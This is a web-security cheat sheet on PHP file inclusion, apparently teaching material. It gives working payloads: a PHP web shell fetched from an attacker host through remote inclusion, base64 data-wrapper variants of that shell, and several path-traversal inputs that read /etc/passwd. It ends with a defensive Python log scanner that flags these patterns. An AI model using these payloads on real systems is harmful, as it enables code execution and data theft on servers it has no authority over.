File Inclusion

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are web application vulnerabilities where an attacker can manipulate file paths to include files, either from the local system (LFI) or remote servers (RFI), potentially leading to unauthorized access or code execution.

Remote File Inclusion (RFI)

If we find a way to include a remote file, we could try to include PHP code to execute commands on the host.

http://<host>/index.php?page=http://<attacker>/shell.txt

We could serve malicious PHP code so that the host interprets it.

echo '<?php system($_GET["cmd"]);?>' > shell.txt
python3 -m http.server 80
curl 'http://<host>/index.php?page=http://<attacker>/shell.txt&cmd=<command>'

If the server were blocking access to external resources, we could attempt to use the data:// wrapper to inject PHP code as base64.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4K

php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4K

Local File Inclusion (LFI)

Absolute Path

http://<host>/index.php?page=/etc/passwd

Relative Path Traversal

http://<host>/index.php?page=../../../etc/passwd

Null Byte

http://<host>/index.php?page=../../../etc/passwd%00

Encoding

http://<host>/index.php?page=%252e%252e%252fetc%252fpasswd
http://<host>/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Truncation

http://<host>/index.php?page=../../../etc/passwd......[ADD MORE]
http://<host>/index.php?page=../../../[ADD MORE]../../../etc/passwd

Filtered characters

http://<host>/index.php?page=....//....//....//etc/passwd
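Detection

The following is an added example, not part of the original page: a log scanner that decodes a request parameter until it is stable and then flags the inclusion patterns listed above (wrappers and remote URLs, traversal including the ....// variant, overlong UTF-8, null bytes, absolute paths, multiple encoding). The function names, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Patterns run on the fully decoded bytes, never on the raw query string.
WRAPPER = re.compile(rb"^(?:https?|ftp|data|php|file|phar|zip|expect)://", re.I)
TRAVERSAL = re.compile(rb"\.\.+[/\\]")     # matches ../ and the ....// variant
OVERLONG = re.compile(rb"\xc0[\xae\xaf]")  # overlong UTF-8 forms of '.' and '/'

def decode_fully(raw, max_rounds=5):
    """Percent-decode until stable; return (bytes, rounds that changed the value)."""
    data, rounds = raw.encode(), 0
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data, rounds

def classify(value):
    """Return the file-inclusion indicators present in one parameter value."""
    data, rounds = decode_fully(value)
    checks = [
        ("remote-or-wrapper", WRAPPER.match(data)),
        ("traversal", TRAVERSAL.search(data)),
        ("overlong-utf8", OVERLONG.search(data)),
        ("null-byte", b"\x00" in data),
        ("absolute-path", data.startswith(b"/")),
        ("multi-encoded", rounds > 1),
    ]
    return [tag for tag, hit in checks if hit]

def scan(log_lines, param="page"):
    """Return (line number, tags) for requests whose `param` value is suspicious."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"[A-Z]+ (\S+) HTTP/', line)
        query = m.group(1).partition("?")[2] if m else ""
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            tags = classify(value) if key == param else []
            if tags:
                findings.append((n, tags))
    return findings

# Constructed access-log lines (sample data, not from the original page).
LOG = '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=%s HTTP/1.1" 200 512'
SAMPLE = [LOG % v for v in (
    "home", "....//....//etc/passwd", "../../etc/passwd%00",
    "%252e%252e%252fetc%252fpasswd", "%c0%ae%c0%ae/etc/passwd",
    "http://rfi.example/inc.txt")]
```

Calling scan(SAMPLE) returns one entry per suspicious line. Matching after decoding is what lets a single traversal pattern cover the double-encoded form as well.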
